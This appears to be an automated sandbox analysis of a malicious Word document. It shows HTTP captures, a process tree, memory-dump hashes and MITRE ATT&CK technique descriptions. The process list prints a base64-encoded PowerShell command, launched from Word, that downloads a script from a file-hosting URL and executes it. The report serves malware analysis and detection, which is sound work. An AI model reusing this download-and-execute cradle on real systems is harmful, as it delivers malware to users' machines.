2025-01-01 16:10:10 UTC	1343	IN	HTTP/1.1 404 Not Found Date: Wed, 01 Jan 2025 16:10:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, private CF-Cache-Status: BYPASS Set-Cookie: XSRF-TOKEN=eyJpdiI6Im1La2dValR6SjVXcFhYdVVzOTNoR0E9PSIsInZhbHVlIjoibnpycEpIZXVSTWFJaUh5OWlaSFNVWU9ONjQreTFDYU1FSXR2Rk5lTmlWWHlzYkJ0UUdyRGwzcTRUQ2dpMlU0Tmo5VjBGWGNUWGo0Z2FGMVhUSGJySGZLdjdpRnJ1QXVCSzFHU0o5Uk95VlZWeitkT2tJWG1sWW9uWjlLRVZ0T24iLCJtYWMiOiJlOWM0OGIzNWZkZDU0ZDhlZDIyMWI2OTM0YTExZDJlMGE1NWI1Y2VkYzNkMGMzMGM1ZDJiNWNiZDkyZjYzMGJlIn0%3D; expires=Wed, 01-Jan-2025 18:10:10 GMT; Max-Age=7200; path=/; samesite=lax Set-Cookie: tmpfiles_session=eyJpdiI6IkVRUnlqa3B1SnE4dko3N0djK2RCcUE9PSIsInZhbHVlIjoiUlR1endod1QrMHQ5dUx3U3lsbnBOdGJyZFo3SFUvWEh1bGVzNG9KY1R1Szh1NnlOQVpSS3Bmek5HcW1aL1VITWlLa0dPd3NWUDYwVnFqRUk0UGhOdmc4dStjOXFmdC9Wd0VVdFJ0Q1F2bmh3UjUySHBvNDRlM3B0cVEzSHFLWTkiLCJtYWMiOiJlZTFhZjJhYjZhNzkwYzNhYzExZjc0ZTQzOTk4YjU4ODk3NDcwNDI1MzI1NDcxMTY4MDQ0NGViZmExMzRkNmVlIn0%3D; expires=Wed, 01-Jan-2025 18:10:10 GMT; Max-Age=7200; path=/; httponly; samesite=lax Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VXUeAVq%2FVAOf%2Bqp6zRxzZxVXFGMNFF%2BBW46GDcZw6DcH%2FCuLQTsdok4FEW8MZ%2Fi1ZASqX10eacEUL4JUqYLcx95C%2BRh99BKKEPGQ21ettWkMiEvDRzCVjOfxkMYSm6A%3D"}],"group":"cf-nel","max_age":604800}
2025-01-01 16:10:10 UTC	362	IN	Data Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 62 33 63 37 32 34 62 39 64 36 30 66 38 33 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 35 33 33 26 6d 69 6e 5f 72 74 74 3d 31 35 32 39 26 72 74 74 5f 76 61 72 3d 35 38 31 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fb3c724b9d60f83-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1533&min_rtt=1529&rtt_var=581&sent=5&recv=6&lost=0&retrans=0&sent_b
2025-01-01 16:10:10 UTC	1369	IN	Data Raw: 31 39 64 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 Data Ascii: 19d1<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Not Found</title> ... Fonts --> <link rel="preconnect" href="ht
2025-01-01 16:10:10 UTC	1369	IN	Data Raw: 23 65 64 66 32 66 37 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 33 37 2c 32 34 32 2c 32 34 37 2c 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 29 29 7d 2e 62 6f 72 64 65 72 2d 67 72 61 79 2d 34 30 30 7b 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 3a 31 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 63 62 64 35 65 30 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 30 33 2c 32 31 33 2c 32 32 34 2c 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 29 29 7d 2e 62 6f 72 64 65 72 2d 74 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 31 70 78 7d 2e 62 6f 72 64 65 72 2d 72 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74 68 3a 31 70 78 7d 2e 66 6c 65 78 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e Data Ascii: #edf2f7;border-color:rgba(237,242,247,var(--border-opacity))}.border-gray-400{--border-opacity:1;border-color:#cbd5e0;border-color:rgba(203,213,224,var(--border-opacity))}.border-t{border-top-width:1px}.border-r{border-right-width:1px}.flex{display:flex}.
2025-01-01 16:10:10 UTC	1369	IN	Data Raw: 72 61 79 2d 33 30 30 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 65 32 65 38 66 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 32 36 2c 32 33 32 2c 32 34 30 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 29 29 7d 2e 74 65 78 74 2d 67 72 61 79 2d 34 30 30 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 63 62 64 35 65 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 30 33 2c 32 31 33 2c 32 32 34 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 29 29 7d 2e 74 65 78 74 2d 67 72 61 79 2d 35 30 30 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 61 30 61 65 63 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 31 36 30 2c 31 37 34 2c 31 39 32 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 Data Ascii: ray-300{--text-opacity:1;color:#e2e8f0;color:rgba(226,232,240,var(--text-opacity))}.text-gray-400{--text-opacity:1;color:#cbd5e0;color:rgba(203,213,224,var(--text-opacity))}.text-gray-500{--text-opacity:1;color:#a0aec0;color:rgba(160,174,192,var(--text-op
2025-01-01 16:10:10 UTC	1369	IN	Data Raw: 7a 69 65 72 28 2e 38 2c 30 2c 31 2c 31 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 38 2c 30 2c 31 2c 31 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 30 2c 2e 32 2c 31 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 30 2c 2e 32 2c 31 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 20 62 6f 75 6e 63 65 7b 30 25 2c 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 32 35 25 29 3b 2d 77 65 62 Data Ascii: zier(.8,0,1,1);animation-timing-function:cubic-bezier(.8,0,1,1)}50%{transform:translateY(0);-webkit-animation-timing-function:cubic-bezier(0,0,.2,1);animation-timing-function:cubic-bezier(0,0,.2,1)}}@keyframes bounce{0%,to{transform:translateY(-25%);-web
2025-01-01 16:10:10 UTC	1141	IN	Data Raw: 28 2d 2d 62 67 2d 6f 70 61 63 69 74 79 29 29 7d 2e 64 61 72 6b 5c 3a 62 6f 72 64 65 72 2d 67 72 61 79 2d 37 30 30 7b 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 3a 31 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 34 61 35 35 36 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 37 34 2c 38 35 2c 31 30 34 2c 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 29 29 7d 2e 64 61 72 6b 5c 3a 74 65 78 74 2d 77 68 69 74 65 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 29 29 7d 2e 64 61 72 6b 5c 3a 74 65 78 74 2d 67 72 61 79 2d 34 30 30 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 Data Ascii: (--bg-opacity))}.dark\:border-gray-700{--border-opacity:1;border-color:#4a5568;border-color:rgba(74,85,104,var(--border-opacity))}.dark\:text-white{--text-opacity:1;color:#fff;color:rgba(255,255,255,var(--text-opacity))}.dark\:text-gray-400{--text-opacity
2025-01-01 16:10:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	11:10:02
Start date:	01/01/2025
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0xb70000
File size:	1'620'872 bytes
MD5 hash:	1A0C2C2E7D9C4BC18E91604E9B0C7678
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:10:07
Start date:	01/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
Imagebase:	0x540000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:10:07
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: __Unknown_Module_Name__

Declaration

Line	Content

Module: __Unknown_Module_Name__

Declaration

Line	Content

Reset < >

Analysis Process: powershell.exePID: 6980, Parent PID: 2148COMMON

Executed Functions

Function 06F91D20 Relevance: 5.7, Strings: 4, Instructions: 651COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F92068
4']q, xrefs: 06F921C2
4']q, xrefs: 06F921B8
4']q, xrefs: 06F9205E

Memory Dump Source

Source File: 00000007.00000002.2139783008.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f90000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: 84ba9aa4a8371ce4ff1cda6ad86f0d2fedbe092187c72a1c1bd2afae7b60a761
Instruction ID: aa6556fa6413bdbb73f2264a1729e0cef9009c1b24dc629ddaf0642a4f1853a4
Opcode Fuzzy Hash: 84ba9aa4a8371ce4ff1cda6ad86f0d2fedbe092187c72a1c1bd2afae7b60a761
Instruction Fuzzy Hash: 37222771F242059FEFA5AB689811B7A7BA2EFC5620F1480BAD505CB351DB32CD81C7B1

Function 06F90488 Relevance: 2.7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F90599
4']q, xrefs: 06F9058D

Memory Dump Source

Source File: 00000007.00000002.2139783008.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f90000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: 831c8031cc6a1c444af655afd04ce0b70f5c14a86eb4f09735bae7153931fd49
Instruction ID: e75b7e9e8f268c6a649ae63ee6e9c096600cb1f076a1b76d191f07b6c1c75420
Opcode Fuzzy Hash: 831c8031cc6a1c444af655afd04ce0b70f5c14a86eb4f09735bae7153931fd49
Instruction Fuzzy Hash: 6051F231F142058FEFA66B6D882036E7BA2AFC6610F1480AFE445CB291DF35C981C7B1

Function 06F90468 Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F9058D

Memory Dump Source

Source File: 00000007.00000002.2139783008.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f90000_powershell.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 42bccb0f2dd48f7672108130a61d4d116dd1ab5447647d222d46f3e03c15e64a
Instruction ID: d4fb64a4265dca13bcfc8feaffa1b962d129fbd031d3e2bc07a23af70e7382b1
Opcode Fuzzy Hash: 42bccb0f2dd48f7672108130a61d4d116dd1ab5447647d222d46f3e03c15e64a
Instruction Fuzzy Hash: 7131D131E053059FEFA19F69850036E7BE2AF82350F54406FD844DA292EF39C981CBB1

Function 04525630 Relevance: .5, Instructions: 517COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2130772830.0000000004520000.00000040.00000800.00020000.00000000.sdmp, Offset: 04520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4520000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d0d2b6e3e3d603ac1d3491ab2661c0072bc362270fdaf38b3d11887d16b19c0
Instruction ID: bcf8eacb1f543df0136124186b9adfadddfc4a4467f214ba81dfbd5a414c368d
Opcode Fuzzy Hash: 0d0d2b6e3e3d603ac1d3491ab2661c0072bc362270fdaf38b3d11887d16b19c0
Instruction Fuzzy Hash: E9224A74A01219EFCB15CF58D594AAEFBB1FF89310F24855AE845AB3A1D731EC81CB90

Function 045229F0 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2130772830.0000000004520000.00000040.00000800.00020000.00000000.sdmp, Offset: 04520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4520000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df431bd2961c01c2ca682ec220803cb2d43dd17e3429436a1ea95fcd0ac582f3
Instruction ID: caf7c78a5bca16980f40f5c4118655b4c8f1de5a372fa03b49f7b24baf9e36fb
Opcode Fuzzy Hash: df431bd2961c01c2ca682ec220803cb2d43dd17e3429436a1ea95fcd0ac582f3
Instruction Fuzzy Hash: BF918B78A002059FCB15CF58C5949AEFBB1FF49310F25859AE855AB3A1C736FC51CBA0

Function 06F91D00 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2139783008.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6da3e96d38d9531d42f3151ad2b1adaceb088b303e7057bfa426f0126aea8c32
Instruction ID: 046d1f6641d4d327aad4c2c701fb7a665477b8c861896b216cf926725fa987c4
Opcode Fuzzy Hash: 6da3e96d38d9531d42f3151ad2b1adaceb088b303e7057bfa426f0126aea8c32
Instruction Fuzzy Hash: 41410431E043068FEFA5EFA88940A7A7BB3EF82650B1540BBD8059B351DB31D941C7B1

Function 04522B00 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2130772830.0000000004520000.00000040.00000800.00020000.00000000.sdmp, Offset: 04520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4520000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dcc2e6fd4f58cac6790039c4249bf30f6d2416fbd06cd8c550b9c8974c87927
Instruction ID: de21007d9948e60900d621621bd3377f4c8515a5817556f7e150a9502536b99d
Opcode Fuzzy Hash: 3dcc2e6fd4f58cac6790039c4249bf30f6d2416fbd06cd8c550b9c8974c87927
Instruction Fuzzy Hash: 0F4158B8A001159FCB09CF48C1989AAFBB1FF49310F15859AE815AB3A4C732FC51DBA0

Function 04524810 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2130772830.0000000004520000.00000040.00000800.00020000.00000000.sdmp, Offset: 04520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4520000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ff3ef6a3eb4524ab4de1ecfe12d7bf7a24674486e952d6fd6dfd8831a7b1831
Instruction ID: c8588fbe9f7b150b3c1cbded657d370f2f9a2efc8655a0b613a29c120b9236ef
Opcode Fuzzy Hash: 2ff3ef6a3eb4524ab4de1ecfe12d7bf7a24674486e952d6fd6dfd8831a7b1831
Instruction Fuzzy Hash: 05215E74A042598FCB05CF5CC5809AEBBB0FF8A300B14859AD805EB352C331FC41CBA1

Function 04524800 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2130772830.0000000004520000.00000040.00000800.00020000.00000000.sdmp, Offset: 04520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4520000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f31959703bf2fac1a99136d0231730633d406bfd0e4f677eb17f75f656944f4d
Instruction ID: fe5168824db7504d83500d540dc80cc910d3a4e21a4952822893276331ee6449
Opcode Fuzzy Hash: f31959703bf2fac1a99136d0231730633d406bfd0e4f677eb17f75f656944f4d
Instruction Fuzzy Hash: CD212C74E042599FCB00DF98D5909AEBBF0FF89310B1585AAE819AB351D731FC41CBA1

Function 0408D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2130497853.000000000408D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0408D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_408d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcbd083aeb6aed82c01f7a86b28a20dafa1887b7cb839fc9feeaedc98e6b3538
Instruction ID: ba03faedaab32e212a22c36b83ccade3479c4cf577b223529f9339b703de53c1
Opcode Fuzzy Hash: fcbd083aeb6aed82c01f7a86b28a20dafa1887b7cb839fc9feeaedc98e6b3538
Instruction Fuzzy Hash: DE01FC715043049AD7215E15EE8476AFFD8DF41324F08C61EED881A282D679E441CAB2

Function 0408D007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2130497853.000000000408D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0408D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_408d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c16eff56c75036453d5e4450ccca074af8120efc1cd0088f31a943d503d00484
Instruction ID: f1d94f8efb753d5c5675d754e227a5da7eb660238842eb18f0867a12d7175ec0
Opcode Fuzzy Hash: c16eff56c75036453d5e4450ccca074af8120efc1cd0088f31a943d503d00484
Instruction Fuzzy Hash: EC015E7140E3C09EE7129B259D94B52BFB4DF43224F1DC1DBD8889F2A3C2699849CB72

Non-executed Functions

Function 06F91380 Relevance: 9.2, Strings: 7, Instructions: 491COMMON

Download Yara Rule

Strings

$]q, xrefs: 06F913B8
4']q, xrefs: 06F915F1
$]q, xrefs: 06F91392
tP]q, xrefs: 06F91409
tP]q, xrefs: 06F913FD
4']q, xrefs: 06F915E7
$]q, xrefs: 06F913C4

Memory Dump Source

Source File: 00000007.00000002.2139783008.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f90000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
API String ID: 0-108373575
Opcode ID: 88afd86429935348f28ba1644f131c152a7aa7060c0c2e35d00f64ef7ceb2dc1
Instruction ID: dd4387b30eb04b0b3a81bbb78ca566cc500859657185c06ea48f0063247c5d07
Opcode Fuzzy Hash: 88afd86429935348f28ba1644f131c152a7aa7060c0c2e35d00f64ef7ceb2dc1
Instruction Fuzzy Hash: 50F1F772F042168FEFA5DB6D840176ABBE2EFC5620F15807AD84ACB351DB32D845C7A1

Function 06F906D0 Relevance: 9.1, Strings: 7, Instructions: 313COMMON

Download Yara Rule

Strings

tP]q, xrefs: 06F9091D
4']q, xrefs: 06F907DF
$]q, xrefs: 06F908E4
4']q, xrefs: 06F907D3
tP]q, xrefs: 06F90929
$]q, xrefs: 06F908B2
$]q, xrefs: 06F908D8

Memory Dump Source

Source File: 00000007.00000002.2139783008.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f90000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
API String ID: 0-108373575
Opcode ID: 2ca3c2eedf606cc01234105e0f05ce413e20f18868d8b90937ea93f485622449
Instruction ID: c59a98b0792c3a6106c8abcd7beba20ab9a75cbb1c48c88f3fef9c88ab0db0a9
Opcode Fuzzy Hash: 2ca3c2eedf606cc01234105e0f05ce413e20f18868d8b90937ea93f485622449
Instruction Fuzzy Hash: 6FA10532F182558FEBA99A69941077ABBE69FC5620B18806FD445CB351DE32CC41C7F1

Function 06F93520 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 06F9354E
$]q, xrefs: 06F93532
$]q, xrefs: 06F93588
$]q, xrefs: 06F9357C

Memory Dump Source

Source File: 00000007.00000002.2139783008.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f90000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 87dbfb63d3785444ce62c2272c3eb0296d47c3c25102e54a967c949e2d28092a
Instruction ID: 516d23553097d1015987d475390389f8c7acfe98d720c3366c7b52bf2412072f
Opcode Fuzzy Hash: 87dbfb63d3785444ce62c2272c3eb0296d47c3c25102e54a967c949e2d28092a
Instruction Fuzzy Hash: EF210737F103025BFFB8566E9840B37A7D69FC8B10F24842AA94AC7381DD66D841C371

Function 06F90308 Relevance: 5.0, Strings: 4, Instructions: 50COMMON

Download Yara Rule

Strings

$]q, xrefs: 06F90352
$]q, xrefs: 06F9035E
4']q, xrefs: 06F90373
4']q, xrefs: 06F9037F

Memory Dump Source

Source File: 00000007.00000002.2139783008.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f90000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: 89ebc036d9426fffab890103557d0ee24ce45ccedce5a7289b506c8ae84456d6
Instruction ID: 2d8c05c3958916e3b2f7a0f59d0006db05c0a5fc8c662c1bd09b990c35b4f8e4
Opcode Fuzzy Hash: 89ebc036d9426fffab890103557d0ee24ce45ccedce5a7289b506c8ae84456d6
Instruction Fuzzy Hash: 2A01F221B1A3944FEB6B227C0C22A653FB74F8291032A00DBD885DF393CD554C0683B3

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

